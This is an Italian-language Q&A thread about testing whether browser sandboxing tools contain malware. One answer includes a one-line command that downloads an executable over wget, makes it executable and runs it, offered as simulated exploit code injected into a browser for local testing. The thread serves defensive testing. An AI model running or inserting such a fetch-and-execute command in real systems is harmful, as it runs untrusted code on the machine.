Come testare la sicurezza di un browser Web consolidato?

1

Voglio testare realmente la sicurezza di un browser web in modalità sandbox e hardened dopo aver implementato strumenti di sicurezza di terze parti che pretendono di indurire il browser.

Quindi, come posso o quale approccio devo seguire per testare la sicurezza di un browser web?

Modifica: in particolare voglio testare le funzionalità sandbox degli strumenti di terze parti che ho installato. Fanno davvero vietare a un malware di diffondersi su tutto il PC? Il vettore di attacco di malware potrebbe essere un download drive-by da un sito Web infetto (simulato).

    
posta user3200534 11.07.2017 - 09:34
fonte

2 risposte

2

Se vuoi testare le funzionalità sandbox hai bisogno di qualcosa come un vero exploit che proverà a fare qualcosa che un utente malintenzionato potrebbe fare. Ma penso che non sia davvero possibile per te ottenere un exploit per un browser corrente. Quindi hai le seguenti opzioni:

  1. Testare la sandbox con un eseguibile personalizzato creando un eseguibile che usi le tecniche sandbox e proverà ad eseguire un payload. I risultati potrebbero essere comparabili se il tuo browser non utilizza tecniche sandbox da solo.
  2. Prova la tua sandbox con una versione precedente del browser e un exploit pubblico disponibile.
  3. Simula un tentativo di exploit introducendo un codice personalizzato nel tuo browser come system("wget http://127.0.0.1/t.elf; chmod +x ./elf; ./elf"); Se il tuo browser è open source potresti ad esempio creare una versione personalizzata del tuo browser e aggiungere il codice personalizzato in una regione di codice dove anche una vera vulnerabilità essere.
risposta data 11.07.2017 - 17:37
fonte
0

Dipende dal tipo di test che stai cercando di fare. Se l'indurimento che hai fatto è stato progettato per impedire al browser di divulgare informazioni in modo inopportuno, potresti impostare qualcosa come Wireshark sulla macchina su cui stai lavorando per controllare il traffico inviato dal browser.

Se stai cercando di verificare se il browser può essere arrestato in modo sfruttabile, allora è diverso. sarebbe una specie di processo complesso ma qualcosa come American Fuzz Lop potrebbe essere un punto di partenza.

    
risposta data 11.07.2017 - 10:26
fonte